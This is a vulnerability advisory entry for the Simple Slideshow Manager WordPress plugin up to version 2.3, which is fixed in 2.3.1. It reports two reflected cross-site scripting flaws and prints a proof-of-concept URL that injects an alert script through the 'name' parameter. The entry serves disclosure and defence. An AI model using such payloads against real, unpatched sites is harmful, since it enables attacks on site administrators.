Simple Slideshow Manager <= 2.3 – Multiple Vulnerabilities | Plugin Vulnerabilities

Description

The Simple Slideshow Manager WordPress plugin was affected by security vulnerability.

Proof of Concept

3.1 Cross-Site Scripting
Vulnerable Function: echo
Vulnerable Variable: $_GET['name']
Vulnerable URL:
http://www.vulnerablesite.com/wp-admin/admin.php?page=Acurax-Slideshow-AddImages&name="></script><script>alert(42)</script>

3.2 Cross-Site Scripting
Vulnerable Function: echo
Vulnerable Variable: $_SERVER['REQUEST_URI']
Vulnerable URL:
http://www.vulnerablesite.com/wp-admin/admin.php?page=Acurax-Slideshow-AddImages&name="></script><script>alert(42)</script>

Affects Plugins

simple-slideshow-manager

Fixed in 2.3.1

References

URL

http://defensecode.com/advisories/DC-2017-02-016_WordPress_Simple_Slideshow_Manager_Plugin_Advisory.pdf

Miscellaneous

Submitter

Neven Biruski

Submitter website

http://www.defensecode.com

Submitter twitter

Verified

No

WPVDB ID

9880b690-3e51-41de-8c7f-5e7dbe36dd8e

Timeline

Publicly Published

2017-05-31 (about 8 years ago)

Added

2017-06-01 (about 8 years ago)

Last Updated

2019-11-01 (about 6 years ago)

Other

Published

Title

Published

2016-07-06

Title

WP Maintenance Mode <= 2.0.6 - Authenticated Multisite Remote Code Execution

Published

2014-08-01

Title

Slash WP - FPD, XSS & CS vulnerabilities

Published

2020-06-28

Title

Nexos - Real Estate < 1.8 - Unauthenticated Reflected XSS & SQL Injection

Published

2014-08-01

Title

Enable Media Replace <= 2.3 - Multiple Vulnerabilities

Published

2015-07-11

Title

CP Contact Form with Paypal <= 1.1.5 - Multiple Vulnerabilities